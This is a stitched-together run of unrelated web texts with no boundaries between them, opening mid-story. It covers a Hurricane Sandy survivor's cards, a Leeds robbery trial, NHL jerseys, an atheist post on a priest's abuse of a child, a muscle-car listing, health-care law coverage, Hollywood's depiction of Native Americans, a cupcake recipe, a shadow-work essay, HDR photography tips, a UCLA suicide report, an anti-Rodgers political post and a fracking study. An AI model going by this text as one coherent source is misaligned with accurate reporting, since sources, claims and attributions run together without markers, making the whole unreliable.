That simple goodness touched the same in others as far as the Internet can reach. And in a poetic twist the returned goodness manifested itself not as emails but as so many actual cards that Roberts half jokes it might have helped out the world's ailing postal services, even if it was a bit of burden for her particular mailman.
“All the stamps,” Roberts notes.
One woman sent a photo of herself posting a letter to her fiancé more than a half century ago while he was off fighting in World War II. She also enclosed as a testament to mailed wishes some subsequent photos taken by her and her safely returned new husband on their honeymoon in Washington, D.C.
The woman could not have known when she sent the pictures to Roberts that her own husband, Walter Roberts, had served in World War II and landed at Normandy and that Roberts had spent her own honeymoon in the nation's capital, followed by a happy 64 years together in Rockaway until his death in 2010.
Before his retirement, Walter Roberts had been an insurance broker, and Patsy Roberts had worked in a card store. She had taken to sending cards to family and friends on all occasions and even for no particular reason other than to say she was thinking of them.
“The people started sending cards to me,” she remembers. “So, I had boxes and boxes of them.”
She stored the boxes in the basement of her home just one house in from the beach, not imagining that a hurricane might do what Sandy did.
“I've been through many hurricanes,” she says. “Never in a million years did I think anything like that could happen.”
Instead she now has new cards, such as one on which a youngster drew undersea creatures writing letters.
“I'm sorry all of your letters washed away,” he wrote. “I'd like to think the fish found them and read them and learned how great you are then they decided to write you.”
If no cards actually arrived from under the sea, they came from seemingly everywhere else.
“Most of them are in English,” she says. “I try to read every single one of them. Each one is precious.”
Until her house is repaired, Roberts will be living in a second-floor apartment in Rockaway with her daughter Virginia Dobles and her son-in-law, the artist Cristian Dobles. He was the one who made the original Facebook posting saying he hoped to inspire as many as 1,000 people to write her. The Daily Beast joined the effort, and the result is the 12,000 cards.
“It's a good feeling,” she said. “You just feel, oh, this is great. Life is good—after all.”
This is the moment an armed robber was tackled to the ground by ‘have-a-go heroes', who helped police secure a lengthy conviction for an Estonian gang.
Three men, who had flown into the UK from their native country just days before they raided a jeweller in Leeds, stole almost £1 million worth of watches during the daylight robbery on March 24.
One of the gang members, Alar Kajurand, wore a dark wig and hat to pose as a customer and lure the security guard into opening the door.
His accomplice, Taimar Uibopuu, then followed him into the shop and pointed a handgun at the guard before he and a third man, Rainis Kilk, began removing watches from the window display.
As the robbery was carried out, Kajurand directed the terrified staff to the back of the shop at gunpoint.
The raid lasted just three minutes but members of the public had already contacted the police before the gang fled.
As the robbers left the jewellers, Uibopuu 30, was charged at by a passer-by and pinned to the ground until officers arrived.
A total of 64 watches worth nearly £500,000, a hammer, a scarf and a return train ticket from Manchester to Leeds were all found in Uibopuu's possession.
Kajurand, 44, and Kilk, 26, fled the scene, but officers soon realised they were likely to be in Manchester, thanks to the evidence found on Uibopuu.
Kajurand and Kilk were arrested by firearms officers at their hotel room in the early hours of the next day and a receipt for a BB gun bought two days earlier was found.
Extensive enquiries by West Yorkshire Police uncovered other evidence that linked the men to the robbery and Kilk and Kajurand to a raid in London.
Detectives found that Kilk's DNA had been identified on a plastic drinks bottle recovered from the scene of a robbery at Watches of Switzerland in Oxford Street on February 25.
Kajurand and Kilk flew to London days before the robbery and stole six Cartier watches worth more than £28,000 after threatening staff with a handgun and smashing a cabinet with a hammer.
Kilk was involved in a struggle with a security guard as they left the shop and was only released when Kajurand returned and threatened the guard at gunpoint.
A drawstring bag containing a seventh Cartier watch, a baseball cap, a pair of wire cutters and a bottle with Kilk's DNA on were left behind following the struggle.
The men were subsequently charged with conspiracy to commit robberies in relation to both offences.
The trio were jailed for a total of 51 years at Leeds Crown Court yesterday after being found guilty.
Kajurand and Kilk were each sentenced to 18 years while Uibopuu was jailed for 15 years.
Detective Inspector Phil Jackson, from Leeds District CID, said: “They put very detailed planning into the offences and did everything they could to avoid detection.
“What they hadn't bargained on was the very courageous actions of the members of the public who intervened and detained one of the gang at the scene of the Leeds robbery and forced them to leave behind crucial evidence in London.
“While we never encourage members of the public to put themselves at risk, their actions proved absolutely vital in bringing these men to justice.”
Back in July, another listing from the same seller offered an alleged "rare authentic" Vancouver Canucks sweater. The tag was dated September 2006, a full year before the blue and green jerseys were introduced.
This one is just painful. So many bullets dodged. First, remember that Reebok template I railed against earlier this week? The one Pittsburgh, Ottawa and Tampa Bay all used in 2007. Looks like Reebok was trying to push it on Vancouver as well.
Second, it looks like the Canucks considered sticking with the 1997 color scheme. I call it a dodged bullet, but in truth it was a unique look. No other team before or since has used it. But green and blue are definitely more fitting.
The best thing this prototype had going for it was the lack of the word "VANCOUVER" arched across the upper chest. Everything else about it... yikes.
What do you think of these jerseys? Have you seen any other interesting NHL prototypes?
*The Flyers find themselves in Pittsburgh tonight, the poor bastards. Stuck eating sandwiches on soggy bread with cold french fries stuffed inside. Puck drops at 7 and it's sure to be a fun one.
*Might see Jordan Weal tonight! That'll be awesome. Really want to see what this guy brings to the team. [Sons of Penn]
*And here is the man himself, speaking with the beats after practice. [Flyers]
*Claude Giroux wants you to calm down already about them losing a crappy game to crappy Toronto. [CSN Philly]
*Speaking of, take a gander at Charles' ten things to take away from the last-minute loss to the Maple Leafs. [BSH]
*If he keeps it up, Shayne Gostisbehere will be a serious part of the Calder Trophy discussion. Which is awesome. [The Score]
*Speaking of Ghost...this play. And this goal. Oh baby. [BSH]
*On the Flyers most annoying habit. [Inquirer]
*A recent fight in the AHL lead to a very scary moment that has people questioning the place fighting has in hockey (again). [TSN]
*Is a bigger ice surface the answer to the NHL's problems? [TSN]
*NHL players speak out about the little-known ways the league separates them from their money. [Sports Illustrated]
*The NHL seems to have no problem making dumb choices that annoy and alienate its fans; to what end? [The Guardian]
*For the first time in a long time, we could have an NHL playoffs with no Canadian team. [CBC Sports]
*And finally, Russian hockey players score goals. News at 11. [TSN]
This is one of the cases that pushes so many of us from being mere atheists into becoming angry atheists. It's a case of unadulterated religious abuse — the kind that wouldn't be possible if we taught our children critical thinking instead of unsubstantiated faith and unthinking respect for authority. This is the kind of thing that lends credence to the argument that “religion poisons everything.”
Like so many others before him, and doubtless many more to come, Belfast priest James Martin Donaghy has been convicted of sexual assault — a total of seventeen offenses against three boys, though he has since admitted to the existence of other victims. These were boys he found and groomed through his work as a parish priest. Tragic, infuriating, but hardly unusual.
The devil, you might say, is in the details.
In one particular case, prosecutor Ken McMahon revealed to the court, Donaghy encountered a particular seven-year-old boy preparing for his upcoming First Confession and First Communion. The child expressed concern about the teaching on Purgatory — the place where those not destined for eternal torment in Hell must undergo a torturous period of purification to be fit for entry into Heaven. He was distressed to think that his deceased grandfather might be in that place, suffering.
Donaghy convinced the child to perform sexual acts on him by telling him the encounters would “get his grandfather into heaven” — and, naturally, “if he told anyone, it would not work.”
The child went along with the plan, but he clearly experienced misgivings; a few days later, he came to confession to speak to a priest about the experience. He found his abuser on the other side of the confessional screen. How trapped the poor boy must have felt! If he turned to his family, though, he might be putting his grandfather's soul back in torment.
There are all kinds of ways to manipulate children into tolerating and accepting their own exploitation, and abusers are often fiendishly creative. We can't know exactly what went on in the mind of this unnamed child or hundreds of others who suffered at the hands of pedophile priests.
But this particular story is notable because of the particular way the priest manipulated his young victim. Sadly, it fits neatly into the framework of Roman Catholicism as it's too often lived and taught, particularly in strict Catholic communities (like, for instance, late-twentieth-century Belfast).
After all, if acts of penance, prayer, fasting, and charitable giving can get Grandpa out of purgatory more quickly (as the Church has always taught), why not sex acts the priest deems pleasing? Don't forget, a small child has yet to absorb the Church's negativity on sexual matters; he may not grasp much about human sexuality at all and would not understand that the Church classifies this sort of act as a sin. Thus, it's hard to see the abuse for what it really is. There are all kinds of weird, unnatural things people do to try to get Grandpa into heaven. (Try kneeling on a hard floor saying the rosary sometime if you don't believe me.)
Sure, it's a bit different from some of the more mundane ways we help Grandpa. It might be uncomfortable, painful, scary… but this is a religion built on the idea that Jesus suffered and died as a sacrifice for your salvation. Enduring abuse for the sake of the hereafter fits the underlying logic. In fact, the extra burden makes you special. Catholic children hear plenty of stories of the pain and privation suffered by history's saints and martyrs, the very best Catholics and also the ones most loved by God. If God has given you the chance to be like those saints, taking on a bit of extra suffering for the sake of a beloved relative, how can you really say no?
Add to that the unquestioned authority of Catholic priests, who say a lot of frankly outlandish things that children are taught to believe absolutely. Add, too, the cultural and historical circumstances of the time. Diversity and pluralism were not exactly community buzzwords at the time; a Northern Irish child might never be exposed to any possible alternative to the Catholic/Protestant binary. Disbelieving a priest might not even occur to a child in this environment as a possibility. It would be like deciding dogs were fairy-tale creatures even though your family had worked for generations breeding terriers.
Religious pedophilia is a perfect storm.
Many Catholics will complain about the focus we place on pedophile priests, especially when we don't spotlight pedophile teachers or soccer coaches or pediatricians in the same way. There are plenty of reasons for the distinction.
But surely one of them has to be the unique nature of the religious manipulation that takes place, where children are taught to accept authority, embrace redemptive suffering, and unquestioningly obey commands that don't make a lot of sense when they're issued in the name of God.
It's what makes the difference between a harmless worldview that provides comfort to the afflicted and a manipulative belief system that rationalizes abuse and poisons lives.
1970 DODGE HEMI CHALLENGER R/T
$240,000.00
Product Details
Hemi-powered Mopars are hot, and the truth is, many of these special cars were uniquely ordered, enough so that it seems no two are alike. This car was one of 356 Hemi Challenger R/Ts built in the first year of production, 1970. Though a majority of those, 287, were standard hardtops, this example is one of just 11 of them that came with both the A883 4-speed transmission and Shaker hood. The desirable latter option is much rarer than the standard scalloped hood, as testing issues resulted in Chrysler canceling the Shaker on Challenger models early in the 1970 production cycle for much of the model year. This option, coded N96, is verified on the car's accompanying original broadcast sheet. Finished in yellow with body-color 15-inch steel wheels and sport mirrors, this car features a crisp appearance with its premium chrome-edge trim, Hemi and R/T callout badging, and small dog-dish hubcaps. The black longitudinal stripes, black Shaker and wide Goodyear Polyglas F60 tires add nicely balanced contrast to this package. Inside the car is all the right stuff--Pistol Grip shifter, Rallye dash with 150 MPH speedos and 8,000 RPM tach, AM radio, and high-backed bucket seats. All of this was refreshed during the car's restoration. Of course, the engine under that Shaker is the crowning touch. Chrysler rated the 426 Hemi at 425 HP and 490 lb-ft torque. Twin Carter AFBs feed the engine through an aluminum intake, and the roar of air both rushing into the engine and coming out through the chrome exhaust tips helped build the engine's still-intact street legacy. At almost $800 plus associated mandatory extreme-duty equipment, it is not surprising that Hemi models sold in small numbers. Today, these rate among the most blue-chip of collector cars; with proper paperwork, service records, and refreshed to OEM standards, this is a car that will give its new caretaker the same thrill it gave the original buyer years ago.
Since the health care law passed two years ago, government, states, insurers, doctors and hospitals have been building a complex scaffolding to extend insurance to 30 million more Americans.
A U.S. Supreme Court decision expected later this month could eliminate a key plank — the requirement that nearly everyone obtains insurance. That would undermine the new online insurance marketplaces where eventually 20 million people, mainly those without employer coverage, are supposed to shop for health plans with federal subsidies for those who need financial help.
Some states want to knock out another critical provision broadening the federal-state Medicaid program for the poor to cover 17 million more people. The justices also could strike down the entire law or other parts, but most legal experts see the individual insurance requirement as the most vulnerable.
Already, 14 states, including California, Colorado and West Virginia, have authorized creation of the marketplaces, called “exchanges,” where individuals and small businesses could buy coverage. The private sector also has been mobilizing in response to the law. Doctors, hospitals and insurers have begun changing the way they do business as they prepare for an influx of new customers and a new set of incentives that reward more coordination among care-givers and penalize poor performers.
“The train is really well out of the station at this point,” says Sara Collins, a vice president at the Commonwealth Fund, a health foundation in New York City. “Insurance carriers are already functioning in this new world that they're living in.”
The court decision could affect tens of millions of Americans, including:
–People without insurance. By the year 2021, 39 million Americans would lack health insurance if the justices overturn the mandate to obtain insurance, according to the nonpartisan Congressional Budget Office. That would be 16 million more people than if the justices leave the law intact, the CBO says.
–People with ailments who can't get insurance on the open market because insurers won't cover them or charge very high prices. The law requires that insurers accept all applicants.
–Young adults covered under their parents' policies, as well as very sick people who now have limited coverage that has left them with huge medical expenses. The law has already required that insurers allow families to keep covering offspring up to age 26, and it banned insurers from placing limits on the maximum amounts they would pay for anyone's care.
–Those looking for affordable health coverage in the exchanges. RAND, a think tank in Santa Monica, Calif., says premiums would rise by 2.4 percent if the justices nix the individual mandate but leave the rest of the law in place.
Experts say it's impossible to predict what the court will do, given the range of potential options outlined in court pleadings. If they eliminate the individual insurance requirement, they might also eliminate a rule that limits how much more insurers can charge older people than they do younger folks, and a rule requiring plans to accept all customers regardless of health.
Or the justices could strike down larger sections of the law that include financial subsidies, averaging $4,780, that would help lower income people buy coverage in the exchanges.
Experts disagree about how crucial the mandate is to making the new insurance markets work.
Sabrina Corlette, a professor at Georgetown University's Health Policy Institute in Washington who supports the law, says if the court strikes down the mandate, it “would be quite chaotic and disruptive” because healthy people are less likely to join the health insurance pools. If the court strikes down the broader insurance rules for the exchanges, she says, “then we're back to the status quo of people being denied because they have pre-existing conditions, or being told because they have cancer they'll be charged 26 times that of a healthy person.”
Joseph Antos of the American Enterprise Institute, who opposes the law, says the mandate's importance has been exaggerated, especially given the weakness of the penalties for people who don't get coverage. Those start at $95 in 2014 and rise to 2.5 percent of income by 2016, but there are multiple ways people could be exempted, he says.
“I just don't see the insurance market collapsing” if the court strikes down the mandate or other parts of the law, Antos says. He predicts insurers would keep some popular provisions that have already begun, such as family coverage for dependents up to age 26.
The law's ultimate future may rest not with the court but with whichever party wins the White House and Congress in November, says Charlene Frizzera, a health care consultant and former acting administrator of the Centers for Medicare & Medicaid Services.
Republican presidential candidate Mitt Romney has said he would dismantle the law. If President Barack Obama were re-elected but the court had struck the insurance mandate, his administration and states that support the law would have a number of ways to write rules that prod people to get insurance, such as charging people more if they wait until they are sick to sign up.
“If the government really wanted to keep moving forward, there are ways they could make it a quasi-mandate,” Frizzera says. However, without congressional approval such moves could spark legal challenges.
Without the mandate, the health industry, which agreed to new taxes and lower reimbursements as part of the law, may return to Washington and ask for the money back, says Kenneth Raske, president and CEO of Greater New York Hospital Association, which represents facilities throughout the Northeast. He notes that the nation's hospitals gave up $155 billion in Medicare funding over a decade.
“The cuts were used to finance the expansion, and if the expansion doesn't occur, what are the cuts financing? Nothing,” Raske says. If the mandate is removed, he says Capitol Hill “will hear a legitimate and concerted voice from the hospital community to kill the cuts.”
Whatever happens, lawmakers will still have to deal with rising health care costs that are becoming a greater burden on employers and the government, says Douglas Hastings, a health care lawyer in Washington, D.C.
“The underlying dynamics that led us to this point are still here,” he says, “and we're going to have to deal with them.”
jrau@kff.org
Gore Verbinski's new film The Lone Ranger, which opens here next week, has received a bit of a pasting from critics in the US. Plagued by production problems and eventually completed at a staggering cost of $225m (€169m), Verbinski's film has made barely half that amount since it opened in America almost a month ago.
Gore Verbinski's new film The Lone Ranger, which opens here next week, has received a bit of a pasting from critics in the US. Plagued by production problems and eventually completed at a staggering cost of $225m (€169m), Verbinski's film has made barely half that amount since it opened in America almost a month ago.
With a bewildering storyline and a central character who no longer seems to be part of the popular zeitgeist, the movie has signally failed to connect with younger audiences. But Johnny Depp's portrayal of his faithful sidekick Tonto has also ruffled feathers, and has even been labelled retrograde and racist by some.
Depp's Tonto swans around with a dead bird on his head, mumbles in broken English and makes strange chants to the sky in a performance that seems at times like a redskin caricature and would not have looked out of place in 19th-century vaudeville.
One Native American website called Depp's characterisation a "rodeo clown Tonto", while another criticised it for giving the impression that "we are uneducated, irrelevant, non-contributors to society living in teepees out on the plains".
These criticisms seem excessive, however, and Depp, who suspects he may have Cherokee or Creek ancestry, clearly intended his performance to be an ironic commentary on the shameful way in which Native Americans have been portrayed on screen in the past.
And in this regard he certainly has a point.
From the earliest days of American cinema, the so-called 'Indians' have been a handy and convenient scapegoat. Indeed, when Hollywood first began making westerns, they helped reinforce some scurrilous myths about how the West had been won.
In the silent westerns of star directors like DW Griffith and Cecil B DeMille, the Native Americans were generally portrayed as swarming savages with a lust for blood.
They danced elaborately, around campfires if one was handy, and rode semi-naked into battle, waving spears and dropping like flies. Their costumes and behaviour were the inventions of screenwriters who'd grown up reading western potboilers, and these Hollywood Indians were almost never played by actual Native Americans.
While the real 'Indians' loitered on scrubland reservations the US government had duped them into settling on, directors like DW Griffith hired Mexicans and blacked-up Caucasians to play their bloodthirsty savages.
John Ford's 1924 film The Iron Horse is a good example of Hollywood's attitudes to Native Americans at this time. The film's hero was a square-jawed surveyor who's supervising the construction of the first intercontinental railroad, and the enemies of progress were the plains Indians, who snuck around at night slitting the throats of workers.
Indians would often appear in the films of John Ford, but over the years the director's attitude to Native Americans would profoundly change.
To be fair, not all early Hollywood films depicted Indians entirely negatively. In Cecil B DeMille's The Squaw Man, a good-natured English nobleman falls for a squaw in the Midwest and makes her his bride. But the Native American woman probably needed rescuing, and while other films mined the idea of the 'noble savage', Indians for the most part remained the bogeymen in the hills.
In classic 1930s and 1940s westerns, the presence of Indians was often denoted by thumping drums and scalps hanging from trees: no films mentioned the fact that early white settlers also used the barbaric practice of scalping, and may have started it.
Though he was sometimes befriended and occasionally acted as a scout, the Hollywood Indian was not to be trusted, and had murder in his heart. He needed a nemesis, and who better than George Armstrong Custer? The famous general was a central character in more than 30 films, and was generally portrayed as a dashing hero.
In Santa Fe Trail (1940), Ronald Reagan played him as an all-around good egg who helps Errol Flynn repel a dastardly Indian attack. And in They Died With Their Boots On (1941), Flynn himself got to play Custer as a selfless hero who sacrifices himself at Little Big Horn.
A sea change in the depiction of Indians happened slowly, and began in the 1950s. John Ford led the charge. In films like Fort Apache (1948) and She Wore a Yellow Ribbon (1949), Ford had begun exploring the idea that white settlers and soldiers were often as bad as or worse then the Native Americans they demonised.
This notion found its fullest expression in Ford's masterpiece The Searchers, in which John Wayne played a Civil War veteran whose blind hatred of Indians poisons everything around him. But Ford would go even further in his last western, Cheyenne Autumn (1964), a savage indictment of America's treatment of the Indians.
In the late 1960s, as the values of the counterculture took hold in Hollywood, a string of revisionist westerns totally rethought the story of the American west. Ralph Nelson's controversial 1970 western Soldier Blue was heavily criticised for its graphic violence, but American audiences were probably more offended by the fact that the film showed the US Cavalry in a most unflattering light. Nelson's film recreated the notorious Sand Creek Massacre, when an army militia attacked a village of Cheyenne and Arapaho and killed up to 160 men, women and children.
Clint Eastwood's epic 1976 western The Outlaw Josey Wales continued the trend of depicting Native Americans as people rather than monsters. Eastwood played a hardened Confederate veteran who gathers a group of unlikely stragglers as he searches for a safe haven in the aftermath of the Civil War. Among his group are a Cherokee man and a young Navajo woman, and Eastwood's character earns the respect of a fearsome plain Indian chief called Ten Bears by confronting him in battle.
This sympathetic approach to the Native American plight reached its climax in Kevin Costner's multi-Oscar-winning 1990 western Dances with Wolves, in which Costner played a Cavalry Lieutenant who is befriended by Lakota (Sioux) Indians during a hard winter and ends up becoming converted to their cause.
Costner's film was hugely successful but looks a little over-sentimental in retrospect. And when I was lucky enough to visit a Lakota reservation in South Dakota some years back, I found that the Native Americans themselves had mixed feelings about this superficially pro-Indian film. They pointed out, for instance, that when Costner's character fell in love, it was with an adopted white woman rather than a Native American squaw.
Johnny Depp will have channelled all his complex history into his approach to Tonto, but will also have been influenced by the original Tonto from the 1950s Lone Ranger TV series.
On that show, Tonto was played – for once – by a real-life Indian, a Canadian Mohawk called Jay Silverheels. Silverheels's ethnicity was a source of pride for Native Americans, but his performance was not. His Tonto were servile and seemingly illiterate, and Silverheels made things worse by appearing in character on the Johnny Carson show and speaking in monosyllabic English.
And, in a way, the character of Tonto perfectly sums up America's ambivalent attitude to its original inhabitants.
pwhitington@independent.ie
Irish Independent
Today, I got basically the best present ever. (I think my husband was trying to hint that I should bake more.)
Naturally, I had it home less than 8 hours before I decided to make some tasty treats, and went for pumpkin spice cupcakes with maple cream cheese frosting.
Hit the jump for the recipe and more pictures!
Pumpkin Spice Cupcakes with Maple Cream Cheese Frosting (originally from here, altered a bit and sized down)
For the cupcakes:
1 1/2 cups plus 1 tbsp flour, sifted before measuring
3/4 tbsp baking powder
1/4 tsp baking soda
1/4 tsp kosher salt
1 1/2 tsp pumpkin pie spice
1/4 cup unsalted butter, softened
1 cups sugar
1 egg, beaten until frothy
7.5 oz pumpkin puree
1/2 tsp vanilla
3/4 c milk
Method:
In a medium bowl whisk together all dry ingredients except for sugar. In a large bowl, beat butter for 30 seconds. Add sugar and beat until fluffy. Add eggs and vanilla, beat. Add pumpkin and beat until combined. Add flour mixture and milk in alternating amounts, beating after each and ending with the flour. Fill cupcake liners 2/3 full (I much prefer using an ice cream scoop for this) and bake for 22-25 minutes at 375 degrees.
For the frosting:
1 8oz packages of cream cheese, softened
1/4 cup unsalted butter, softened
1/2-1 tsp maple syrup
1/4 tsp vanilla
pinch kosher salt
2 cups powdered sugar
Method:
In a large bowl, beat cream cheese and butter until combined and fluffy. Add everything else and beat until well combined.
Putting it all together:
Cool the cupcakes completely on a wire rack, then frost liberally.
Note: this frosting is a bit soft, so any kind of elaborate piping is probably out of the question. I was a bit concerned it was going to slide off my cupcakes, haha. But it's delicious!
I found some of the Cake Mate Cupcake Gems and sprinkled those on for a little fancy touch.
These are absolutely marvelous with a latte or a icy, tall glass of milk.
Advertisements
Craig Lambert (craiglambert.net) is the author of Shadow Work: The Unseen, Unpaid Jobs That Fill Your Day (now on sale by Counterpoint Press), from which this article has been adapted.
Technology has knocked the bottom rung out of the employment ladder, which has sent youth unemployment around the globe skyrocketing and presented us with a serious economic dilemma. While many have focused on the poor state of our educational system or the “jobless” recovery, another, overlooked factor behind this trend is the phenomenon of “shadow work.” I define shadow work as all the unpaid jobs we do on behalf of businesses and organizations: We are pumping our own gas, scanning our own groceries, booking our travel and busing our tables at Starbucks. Shadow work is a new concept, so as yet, no one has compiled economic data on how many jobs we, the consumers, have taken over from (erstwhile) employees. Yet it is surely a force shrinking the job market, and the unemployment it creates is structural. Thanks in part to this new phenomenon, widespread joblessness could become entrenched in the social landscape.
Consider what you now do yourself: You can bank on your cell phone, check yourself out at CVS or the grocery store without ever speaking to an employee, book your own flights and print your boarding pass at the airport without ever talking to a ticket agent—and that's just in the last few years. Imagine what's coming next.
Story Continued Below
In the modern economy, there is no bigger issue than jobs and the cost of maintaining a staff. For the vast majority of businesses, schools and nonprofits, personnel is the largest budget item. This includes, of course, both salaries and benefits. (The latter were once called “fringe benefits,” though the term “fringe” disappeared when the category outgrew anything resembling a fringe.) Hiring, training and supervising employees augment the cost of personnel, and another outlay kicks in when workers retire—pensions, annuities and, for some employers, the gigantic healthcare costs that pile up from retirement until the end of life, which has become a lengthy period as life spans stretch into the 80s and 90s.
In recent years, salaries in real dollars have either remained static or dropped for most of the labor force. But the galloping cost of benefits—one rule of thumb pegs them at 40 percent of salary—has put steady pressure on employers. Health care expenses, in particular, have driven up this line item. In the United States, health care has become an enormous, seemingly uncontrollable sector, swelling relentlessly and growing far faster than the rest of the economy—much as cancer grows, without relationship to neighboring cells.
Short of a seismic change like universal single-payer health insurance with price controls on drugs and procedures, the upward pressure on employee benefits will continue. The upshot is a strong incentive to replace full-time employees with part-time, outsourced, overseas or contract workers, who receive no benefits. Better yet, simply lay people off—or hand off jobs to customers as shadow work.
Politicians and pundits who shake their heads at the stubbornness of high unemployment rates are either overlooking or ignoring the obvious. Our economic and political system is stacked to reward businesses for discarding employees, not hiring them.
There are three main strategies for cutting payroll; two are well known. Downsizing is a classic : Lay off workers and shift their jobs to the remaining, shrunken staff. Not long ago, a nonprofit education newsletter in Boston replaced all three of its full-time staff members with one new full-time editor and a part-time assistant, who were expected to carry on—with half the previous staffing level. The remaining employees have no choice but to work more. Supposedly they feel grateful to still have jobs. Downsizing is an in-house breed of shadow work created by thinning out both senior people and support staff.
Second, automation replaces employees with machines. This has gone on for centuries, at least since the Industrial Revolution and probably longer. Automation pervades manufacturing and many service industries. Robots do not draw salaries, or belong to labor unions, or receive fringe benefits. They need maintenance, but don't require vacation time, sick time, maternity leaves or, best of all, health insurance. Robots are impeccable “team players” with no personal agendas. They'll work round the clock and on weekends at their regular hourly rate and never ask for raises. Hence, whenever financially feasible, businesses will substitute robotics for people.
The third, less-recognized way to cut staff is to outsource jobs as shadow work. In this model, the customers do the work, operating hand-in-hand with robots to complete transactions. The new check-in kiosk in the hotel lobby, for example, means one less person behind the desk. This pincer movement spins off unemployment that may be permanent, because technology, not the business cycle, drives it. Historically, automation has eliminated jobs at the point of production, e.g., in factories. Shadow work instead deletes jobs at the point of sale, e.g., at drugstore checkouts . As noted, there are no hard data on this yet, but one thing we do know is that points of sale vastly outnumber points of production. The development of ever-more-sophisticated technologies only fuels the growth of new forms of shadow work, as it enables consumers to do more kinds of jobs, and more cheaply. ATMs arrived decades ago, but today, customers can do much of their banking with a handheld device.
Shadow work is squeezing out entry-level jobs that have launched countless careers. These jobs at the base of the economic pyramid pay little but lay the foundation for everything that rises above them—and as with any structure, when the foundation crumbles, the superstructure may collapse as well. Entry-level jobs provide more than a paycheck. They are the sidewalk of the workplace, the platform that allows entry to all the businesses on Main Street.
Ten Tips For Shooting Night HDR in the City
Article by Chris Smith
Photographers usually get into HDR photography because they love to edit images. But before you get them to your computer, you need to properly capture your exposures. And that is especially true when you're shooting HDR images at night. Here are ten tips for shooting night HDR images in the city.
1. Shoot enough brackets
HDR works well with night photography because the dynamic range of your scene can be extremely large. But shooting a set of automatic brackets may not give you all of the range that you need. I like to shoot my brackets in manual. Use live view or your histogram to be sure that your darkest exposure has detail in the highlights and your brightest image has detail in the shadows.
2. Focus manually using live view
When there is very little light in a scene, your camera's autofocus will struggle. I rarely use the viewfinder or autofocus at night. I use live view to compose, focus, and set exposure.
3. Shoot in RAW
White balance makes a huge difference in the feel of your final image. Shoot in RAW so that you can change it later.
4. Use a tripod and a cable release or 2-second delay
For any type of night photography you need to be using a quality tripod and a cable release. I don't like things hanging off of my camera so I use the 2-second delay.
5. Buy the right lens
When choosing a lens for night photography, sharpness should be a priority. For night photography, how the lens handles flare may be just as important. Lens flare is one of the most difficult things to try to remove from an image.
6. Don't use a filter
When shooting in the city at night, you will inevitably have streetlights in or near your frame. If you have a filter on your lens, that light can bounce around between your filter and lens and leave ghost images on your image. Leave your filters off to avoid this.
7. Use a lens hood
Lens hoods are meant to block light entering your lens from the edges of your frame. You might think that at night you wouldn't need one. But when you have a bright light just out of your frame, it will cause flare as bad as the sun during the day.
8. Clean your lens
Dust on your front element will scatter the light that hits it onto your sensor. This leads to what looks like falling snow in your image. Clean your front element before shooting at night.
Ghosts, flares, and snow may not completely ruin your image, but the HDR process will magnify these flaws.
9. Avoid streetlights
Avoid streetlights in the foreground. Even using HDR techniques, there will be no way to see any detail in that area of your picture.
10. Find the ideal ISO for your camera.
High ISO's and long exposures both lead to noise. You need to find the best compromise of these two settings for your camera. At ISO 100, your exposures will suffer from long exposure noise. Shoot around ISO 400 to keep the shooting time and long exposure noise under control.
How many of these things do you do already? If you do all ten, I promise that your night HDR images will improve.
I love to shoot the city of Chicago, teach photography, and help other photographers shoot HDR and the city at my site, www.OutOfChicago.com. You can also follow me at Google+, Flickr, and Facebook.
This post was updated Nov. 8 at 4:05 p.m.
A 63-year-old man died after falling from the UCLA Biomedical Library on Oct. 28.
The Los Angeles County coroner identified the death as a suicide.
UCPD spokesperson Nancy Greenstein said UCPD responded to reports of a person falling from the roof or window at 11:30 a.m. She added the person does not appear to be affiliated with UCLA.
Greenstein said UCPD is not releasing the name and is not investigating the death as a homicide.
The library was closed and blocked off from bystanders after the incident. The library opened again at about 2:20 p.m., according to police at the scene.
Counselors were stationed in the library to help those affected by the death, Greenstein said.
This is the second death on campus in less than two weeks. A 20-year-old student died Oct. 18 after falling from the roof of Boelter Hall. The Los Angeles County coroner ruled the death a suicide.
UCLA sent a campuswide email with the Bruin Support and Safety Guide, which listed support services designed to assist individuals in crisis.
“In light of the two recent deaths at UCLA, one involving a current student and the other a person unaffiliated with the university, it is important to remind everyone of the need to keep ourselves and each other safe,” said Monroe Gorden Jr., interim vice chancellor for student affairs, and Michael Beck, administrative vice chancellor.
Active Minds at UCLA will hold an event Friday at 6 p.m. for students who are affected by the Oct. 18 suicide and the man's death, said Brooke Houser, Active Minds executive director and a fourth-year psychology student. Campus officials and several student organizations will attend to show their support.
Counseling and Psychological Services counselors are available 24/7 on the emergency crisis hotline 310-825-0768.
Contributing reports from Anjishnu Das, Daily Bruin senior staff and Madeleine Pauker, city editor.
Green Bay QB Aaron Rodgers Trashes Trump – Blames President For NFL Kneelers! (Video)
Last Sunday over 200 NFL players knelt during the US national anthem on Gold Star Mothers Day.
Thursday night in Green Bay, the Packers and Bears players ALL stood for the anthem.
They linked arms for social justice.
The NFL players are trying to spin what they are doing as ‘unity' when we all know they are still protesting.
They think their fans are complete idiots.
After the game on Thursday Aaron Rodgers blamed President Trump for the NFL kneelers.
What a disgrace.
Aaron Rodgers: This is about something bigger than that. An invitation to show unity in the face of some divisiveness from the top in this country.
Packers Quarterback, Aaron Rodgers suffered a huge backlash after he called on Green Bay fans to join the team in protest by linking arms during the National Anthem.
Duke Study: Fracking Not Likely Behind Higher Marcellus Water Salinity
Emails: Separate multiple email addresses with semi-colon Your Email: Send email to me as well Subject: Comments: 200-character limit.
A recent Duke University study has concluded that elevated salinity levels in well water in northeastern Pennsylvania were not likely caused by hydraulic fracturing.
The study found elevated levels of salinity with similar geochemistry to deep Marcellus brines in drinking water samples from three groundwater aquifers, but no direct links between the salinity and shale gas exploration in the region.
Instead, naturally occurring pathways in northeastern Pennsylvania could have permitted salts and gases from the Marcellus shale formation deep underground to migrate into shallow drinking water aquifers.
"This is a good news-bad news kind of finding," said Avner Vengosh, professor of geochemistry and water quality at Duke's Nicholas School of the Environment, in a statement.
While hydraulic fracturing is not likely the cause of the elevated salinity levels, the geochemical fingerprint of the salinity detected in well water from the Lock Haven, Alluvium and Catskill aquifers suggests a network of natural pathways exists in some locations, especially in valleys.
"This could mean that some drinking water supplies in northeastern Pennsylvania are at increased risk for contamination, particularly from fugitive gases that leak from shale gas well casings," said Vengosh.
Vengosh said the results of this study are also consistent with water-quality tests conducted in the aquifers in the 1980s before rapid shale gas development began.
In May 2011, the Duke team found elevated levels of methane contamination in drinking water wells located within a kilometer of hydraulic fracturing, but found no evidence of contamination from fracturing fluids or brines.
The new study complements the May 2011 study by showing "there are likely pathways through which methane and brine could flow," said Vengosh.
